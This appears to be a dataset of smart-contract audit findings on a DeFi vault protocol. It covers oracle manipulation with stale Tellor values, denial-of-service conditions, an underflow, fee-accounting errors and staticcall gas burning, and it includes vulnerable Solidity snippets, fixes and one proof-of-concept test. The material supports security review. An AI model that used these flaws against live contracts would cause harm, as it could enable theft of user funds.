Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.
```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // Set our new high water mark, the last nav/share height we took fees\\n navPerShareHighMark = currentNavPerShare;\\n navPerShareHighMarkTimestamp = block.timestamp;\\n emit NewNavHighWatermark(currentNavPerShare, block.timestamp);\\n }\\n emit FeeCollected(fees, sink, shares, profit, idle, debt);\\n}\\n```\\n
Malicious users could use back old values
medium
Per the Teller's User Checklist, it is possible that a potential attacker could go back in time to find a desired value in the event that a Tellor value is disputed. Following is the extract taken from the checklist:\\nEnsure that functions do not use old Tellor values\\nIn the event where a Tellor value is disputed, the disputed value is removed & previous values remain. Prevent potential attackers from going back in time to find a desired value with a check in your contracts. This repo is a great reference for integrating Tellor.\\nThe current implementation lack measure to guard against such attack.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n\\nAnyone can submit a dispute to Tellor by paying a fee. The disputed values are immediately removed upon submission, and the previous values will remain. The attacks are profitable as long as the economic gains are higher than the dispute fee. For instance, this can be achieved by holding large amounts of vault shares (e.g., obtained using own funds or flash-loan) to amplify the gain before manipulating the assets within it to increase the values.
Update the affected function as per the recommendation in Teller's User Checklist.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n \\n// Add the line below\\n if (timestampRetrieved > lastStoredTimestamps[tellorInfo.queryId]) {\\n// Add the line below\\n lastStoredTimestamps[tellorInfo.queryId] = timestampRetrieved;\\n// Add the line below\\n lastStoredPrices[tellorInfo.queryId] = value;\\n// Add the line below\\n } else {\\n// Add the line below\\n value = lastStoredPrices[tellorInfo.queryId]\\n// Add the line below\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\n
Malicious users could manipulate the price returned by the oracle to be higher or lower than expected. The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.
```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n
Incorrect handling of Stash Tokens within the `ConvexRewardsAdapter._claimRewards()`
medium
The primary task of the `ConvexRewardAdapter._claimRewards()` function revolves around claiming rewards for Convex/Aura staked LP tokens.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a "balanceOf()"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for "stash tokens"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n\\nAn intriguing aspect of this function's logic lies in its management of "stash tokens" from AURA staking. The check to identify whether `rewardToken[i]` is a stash token involves attempting to invoke `IERC20(rewardTokens[i]).totalSupply()`. If the returned total supply value is `0`, the implementation assumes the token is a stash token and bypasses it. However, this check is flawed since the total supply of stash tokens can indeed be non-zero. For instance, at this address, the stash token has `totalSupply = 150467818494283559126567`, which is definitely not zero.\\nThis misstep in checking can potentially lead to a Denial-of-Service (DOS) situation when calling the `claimRewards()` function. This stems from the erroneous attempt to call the `balanceOf` function on stash tokens, which lack the `balanceOf()` method. Consequently, such incorrect calls might incapacitate the destination vault from claiming rewards from AURA, resulting in protocol losses.
To accurately determine whether a token is a stash token, it is advised to perform a low-level `balanceOf()` call to the token and subsequently validate the call's success.
The `AuraRewardsAdapter.claimRewards()` function could suffer from a Denial-of-Service (DOS) scenario.\\nThe destination vault's ability to claim rewards from AURA staking might be hampered, leading to protocol losses.
```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n // rest of code \\n\\n // Record balances before claiming\\n for (uint256 i = 0; i < totalLength; ++i) {\\n // The totalSupply check is used to identify stash tokens, which can\\n // substitute as rewardToken but lack a "balanceOf()"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balancesBefore[i] = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n }\\n\\n // Claim rewards\\n bool result = rewardPool.getReward(account, /*_claimExtras*/ true);\\n if (!result) {\\n revert RewardAdapter.ClaimRewardsFailed();\\n }\\n\\n // Record balances after claiming and calculate amounts claimed\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for "stash tokens"\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n if (sendTo != address(this) && amountsClaimed[i] > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(sendTo, amountsClaimed[i]);\\n }\\n }\\n\\n RewardAdapter.emitRewardsClaimed(rewardTokens, amountsClaimed);\\n\\n return (amountsClaimed, rewardTokens);\\n}\\n```\\n
`navPerShareHighMark` not reset to 1.0
medium
The LMPVault will only collect fees if the current NAV (currentNavPerShare) is more than the last NAV (effectiveNavPerShareHighMark).\\n```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n\\nAssume the current LMPVault state is as follows:\\ntotalAssets = 15 WETH\\ntotalSupply = 10 shares\\nNAV/share = 1.5\\neffectiveNavPerShareHighMark = 1.5\\nAlice owned all the remaining shares in the vault, and she decided to withdraw all her 10 shares. As a result, the `totalAssets` and `totalSupply` become zero. It was found that when all the shares have been exited, the `effectiveNavPerShareHighMark` is not automatically reset to 1.0.\\nAssume that at some point later, other users started to deposit into the LMPVault, and the vault invests the deposited WETH to profitable destination vaults, resulting in the real/actual NAV rising from 1.0 to 1.49 over a period of time.\\nThe system is designed to collect fees when there is a rise in NAV due to profitable investment from sound rebalancing strategies. However, since the `effectiveNavPerShareHighMark` has been set to 1.5 previously, no fee is collected when the NAV rises from 1.0 to 1.49, resulting in a loss of fee.
Consider resetting the `navPerShareHighMark` to 1.0 whenever a vault has been fully exited.\\n```\\nfunction _withdraw(\\n uint256 assets,\\n uint256 shares,\\n address receiver,\\n address owner\\n) internal virtual returns (uint256) {\\n..SNIP..\\n _burn(owner, shares);\\n \\n// Add the line below\\n if (totalSupply() == 0) navPerShareHighMark = MAX_FEE_BPS;\\n\\n emit Withdraw(msg.sender, receiver, owner, returnedAssets, shares);\\n\\n _baseAsset.safeTransfer(receiver, returnedAssets);\\n\\n return returnedAssets;\\n}\\n```\\n
Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.
```\\nFile: LMPVault.sol\\n function _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n uint256 fees = 0;\\n uint256 shares = 0;\\n uint256 profit = 0;\\n\\n // If there's no supply then there should be no assets and so nothing\\n // to actually take fees on\\n if (totalSupply == 0) {\\n return;\\n }\\n\\n uint256 currentNavPerShare = ((idle + debt) * MAX_FEE_BPS) / totalSupply;\\n uint256 effectiveNavPerShareHighMark = navPerShareHighMark;\\n\\n if (currentNavPerShare > effectiveNavPerShareHighMark) {\\n // Even if we aren't going to take the fee (haven't set a sink)\\n // We still want to calculate so we can emit for off-chain analysis\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n```\\n
Vault cannot be added back into the vault registry
medium
When removing a vault from the registry, all states related to the vaults such as the `_vaults`, `_assets`, `_vaultsByAsset` are cleared except the `_vaultsByType` state.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, "vaultAddress");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n\\nThe uncleared `_vaultsByType` state will cause the `addVault` function to revert when trying to add the vault back into the registry even though the vault does not exist in the registry anymore.\\n```\\n if (!_vaultsByType[vaultType].add(vaultAddress)) revert VaultAlreadyExists(vaultAddress);\\n```\\n
Clear the `_vaultsByType` state when removing the vault from the registry.\\n```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, "vaultAddress");\\n// Add the line below\\n ILMPVault vault = ILMPVault(vaultAddress);\\n// Add the line below\\n bytes32 vaultType = vault.vaultType();\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n// Add the line below\\n if (!_vaultsByType[vaultType].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n
The `addVault` function is broken in the edge case when the updater tries to add the vault back into the registry after removing it. It affects all the operations of the protocol that rely on the vault registry.
```\\n function removeVault(address vaultAddress) external onlyUpdater {\\n Errors.verifyNotZero(vaultAddress, "vaultAddress");\\n\\n // remove from vaults list\\n if (!_vaults.remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n address asset = ILMPVault(vaultAddress).asset();\\n\\n // remove from assets list if this was the last vault for that asset\\n if (_vaultsByAsset[asset].length() == 1) {\\n //slither-disable-next-line unused-return\\n _assets.remove(asset);\\n }\\n\\n // remove from vaultsByAsset mapping\\n if (!_vaultsByAsset[asset].remove(vaultAddress)) revert VaultNotFound(vaultAddress);\\n\\n emit VaultRemoved(asset, vaultAddress);\\n }\\n```\\n
LMPVault.updateDebtReporting could underflow because of subtraction before addition
medium
`debt = totalDebt - prevNTotalDebt + afterNTotalDebt` where prevNTotalDebt equals `(destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1)` and the key to finding a scenario for underflow starts by noting that each value deducted from totalDebt is calculated as `cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up)`\\nLMPDebt\\n```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n\\nLet: `totalDebt = destInfo.currentDebt = destInfo.debtBasis = cachedCurrentDebt = cachedDebtBasis = 11` `totalSupply = destInfo.ownedShares = cachedDvShares = 10`\\nThat way: `cachedCurrentDebt * 1 / cachedDvShares = 1.1` but totalDebtBurn would be rounded up to 2\\n`sharesToBurn` could easily be 1 if there was a loss that changes the ratio from `1:1.1` to `1:1`. Therefore `currentDvDebtValue = 10 * 1 = 10`\\n```\\nif (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n}\\n\\n// Shouldn't pull more than we want\\n// Or, we're not in profit so we limit the pull\\nif (currentDvDebtValue < maxAssetsToPull) {\\n maxAssetsToPull = currentDvDebtValue;\\n}\\n\\n// Calculate the portion of shares to burn based on the assets we need to pull\\n// and the current total debt value. These are destination vault shares.\\nsharesToBurn = currentDvShares.mulDiv(maxAssetsToPull, currentDvDebtValue, Math.Rounding.Up);\\n```\\n\\nSteps\\ncall redeem 1 share and previewRedeem request 1 `maxAssetsToPull`\\n2 debt would be burn\\nTherefore totalDebt = 11-2 = 9\\ncall another redeem 1 share and request another 1 `maxAssetsToPull`\\n2 debts would be burn again and\\ntotalDebt would be 7, but prevNTotalDebt = 11 * 8 // 10 = 8\\nUsing 1, 10 and 11 are for illustration and the underflow could occur in several other ways. E.g if we had used `100,001`, `1,000,010` and `1,000,011` respectively.
Add before subtracting. ETH in circulation is not enough to cause an overflow.\\n```\\n- debt = totalDebt - prevNTotalDebt + afterNTotalDebt\\n+ debt = totalDebt + afterNTotalDebt - prevNTotalDebt\\n```\\n
_updateDebtReporting could underflow and break a very important core functionality of the protocol. updateDebtReporting is so critical that funds could be lost if it doesn't work. Funds could be lost both when the vault is in profit or at loss.\\nIf in profit, users would want to call updateDebtReporting so that they get more asset for their shares (based on the profit).\\nIf in loss, the whole vault asset is locked and withdrawals won't be successful because the Net Asset Value is not supposed to reduce by such action (noNavDecrease modifier). Net Asset Value has reduced because the loss would reduce totalDebt, but the only way to update the totalDebt record is by calling updateDebtReporting. And those impacted the most are those with large funds. The bigger the fund, the more NAV would decrease by withdrawals.
```\\n// rest of code\\nL292 totalDebtBurn = cachedCurrentDebt.mulDiv(sharesToBurn, cachedDvShares, Math.Rounding.Up);\\n// rest of code\\nL440 uint256 currentDebt = (destInfo.currentDebt * originalShares) / Math.max(destInfo.ownedShares, 1);\\nL448 totalDebtDecrease = currentDebt;\\n```\\n
LMPVault: DoS when `feeSink` balance hits `perWalletLimit`
medium
`_collectFees` mints shares to `feeSink`.\\n```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n\\n`_mint` calls `_beforeTokenTransfer` internally to check if the target wallet exceeds `perWalletLimit`.\\n```\\nfunction _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override whenNotPaused {\\n // rest of code.\\n if (balanceOf(to) + amount > perWalletLimit) {\\n revert OverWalletLimit(to);\\n }\\n}\\n```\\n\\n`_collectFees` function will revert if `balanceOf(feeSink) + fee shares > perWalletLimit`. `updateDebtReporting`, `rebalance` and `flashRebalance` call `_collectFees` internally so they will be unfunctional.
Allow `feeSink` to exceeds `perWalletLimit`.
`updateDebtReporting`, `rebalance` and `flashRebalance` won't be working if `feeSink` balance hits `perWalletLimit`.
```\\nfunction _collectFees(uint256 idle, uint256 debt, uint256 totalSupply) internal {\\n address sink = feeSink;\\n // rest of code.\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n // rest of code.\\n}\\n```\\n
Incorrect amount given as input to `_handleRebalanceIn` when `flashRebalance` is called
medium
The issue occurs in the `flashRebalance` function below :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming "In", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get "before" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the "out" assets\\n // and get our "in" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256("ERC3156FlashBorrower.onFlashLoan")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nAs we can see from the code above, the function executes a flashloan in order to receive th tokenIn amount which should be the difference between `tokenInBalanceAfter` (balance of the contract after the flashloan) and `tokenInBalanceBefore` (balance of the contract before the flashloan) : `tokenInBalanceAfter` - `tokenInBalanceBefore`.\\nBut when calling the `_handleRebalanceIn` function the wrong deposit amount is given as input, as the total balance `tokenInBalanceAfter` is used instead of the received amount `tokenInBalanceAfter` - tokenInBalanceBefore.\\nBecause the `_handleRebalanceIn` function is supposed to deposit the input amount to the destination vault, this error can result in sending a larger amount of funds to DV then what was intended or this error can cause a DOS of the `flashRebalance` function (due to the insufficient amount error when performing the transfer to DV), all of this will make the rebalance operation fail (or not done correctely) which can have a negative impact on the LMPVault.
Use the correct received tokenIn amount `tokenInBalanceAfter - tokenInBalanceBefore` as input to the `_handleRebalanceIn` function :\\n```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming "In", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get "before" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the "out" assets\\n // and get our "in" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256("ERC3156FlashBorrower.onFlashLoan")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit Use `tokenInBalanceAfter - tokenInBalanceBefore` as input\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter - tokenInBalanceBefore);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n
See summary
```\\nfunction flashRebalance(\\n DestinationInfo storage destInfoOut,\\n DestinationInfo storage destInfoIn,\\n IERC3156FlashBorrower receiver,\\n IStrategy.RebalanceParams memory params,\\n FlashRebalanceParams memory flashParams,\\n bytes calldata data\\n) external returns (uint256 idle, uint256 debt) {\\n // rest of code\\n\\n // Handle increase (shares coming "In", getting underlying from the swapper and trading for new shares)\\n if (params.amountIn > 0) {\\n IDestinationVault dvIn = IDestinationVault(params.destinationIn);\\n\\n // get "before" counts\\n uint256 tokenInBalanceBefore = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Give control back to the solver so they can make use of the "out" assets\\n // and get our "in" asset\\n bytes32 flashResult = receiver.onFlashLoan(msg.sender, params.tokenIn, params.amountIn, 0, data);\\n\\n // We assume the solver will send us the assets\\n uint256 tokenInBalanceAfter = IERC20(params.tokenIn).balanceOf(address(this));\\n\\n // Make sure the call was successful and verify we have at least the assets we think\\n // we were getting\\n if (\\n flashResult != keccak256("ERC3156FlashBorrower.onFlashLoan")\\n || tokenInBalanceAfter < tokenInBalanceBefore + params.amountIn\\n ) {\\n revert Errors.FlashLoanFailed(params.tokenIn, params.amountIn);\\n }\\n\\n if (params.tokenIn != address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n
OOG / unexpected reverts due to incorrect usage of staticcall.
medium
The function `checkReentrancy` in `BalancerUtilities.sol` is used to check if the balancer contract has been re-entered or not. It does this by doing a `staticcall` on the pool contract and checking the return value. According to the solidity docs, if a `staticcall` encounters a state change, it burns up all gas and returns. The `checkReentrancy` tries to call `manageUserBalance` on the vault contract, and returns if it finds a state change.\\nThe issue is that this burns up all the gas sent with the call. According to EIP150, a call gets allocated 63/64 bits of the gas, and the entire 63/64 parts of the gas is burnt up after the staticcall, since the staticcall will always encounter a storage change. This is also highlighted in the balancer monorepo, which has guidelines on how to check re-entrancy here.\\nThis can also be shown with a simple POC.\\n```\\nunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n emit log_named_uint("Gas before price1", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint("price1", price1);\\n emit log_named_uint("Gas after price1 ", gasleft());\\n }\\n```\\n\\nThe oracle is called to get a price. This oracle calls the `checkReentrancy` function and burns up the gas. The gas left is checked before and after this call.\\nThe output shows this:\\n```\\n[PASS] testAttack() (gas: 9203730962297323943)\\nLogs:\\nGas before price1: 9223372036854745204\\nprice1: 1006294352158612428\\nGas after price1 : 425625349158468958\\n```\\n\\nThis shows that 96% of the gas sent is burnt up in the oracle call.
According to the monorepo here, the staticall must be allocated a fixed amount of gas. Change the reentrancy check to the following.\\n```\\n(, bytes memory revertData) = address(vault).staticcall{ gas: 10_000 }(\\n abi.encodeWithSelector(vault.manageUserBalance.selector, 0)\\n );\\n```\\n\\nThis ensures gas isn't burnt up without reason.
